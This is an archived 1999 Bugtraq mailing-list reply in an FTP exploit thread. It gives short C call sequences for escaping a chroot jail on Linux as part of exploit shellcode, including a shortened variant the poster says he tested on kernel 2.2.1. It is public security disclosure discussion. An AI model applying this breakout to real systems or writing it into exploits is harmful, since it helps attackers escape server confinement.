Bugtraq mailing list archives
Re: another ftp exploit (fwd)
From: artem () AM ALEXRADIO COM (Artem Malyshev)
Date: Fri, 26 Mar 1999 14:08:25 +0200
/* To break chroot we have to... fd = open ( ".", O_RDONLY ); mkdir ( "hax0r", 0666 ); chroot ( "hax0r" ); fchdir ( fd ); for ( i = 0; i < 254; i++ ) chdir ( ".." ); chroot ( "." ); */
Too complex for standart linux All we have to do to break chroot is: mkdir("/sh"); // we already have string "/sh" in memory as a part of // "/bin/sh" chroot("/sh"); chroot("../../../../../../../../../"); // a number of "../" here, // I used 0x10 Last string can be built is stack with a simple loop Tested on linux 2.2.1 -am
Current thread:
- Re: another ftp exploit (fwd) Artem Malyshev (Mar 26)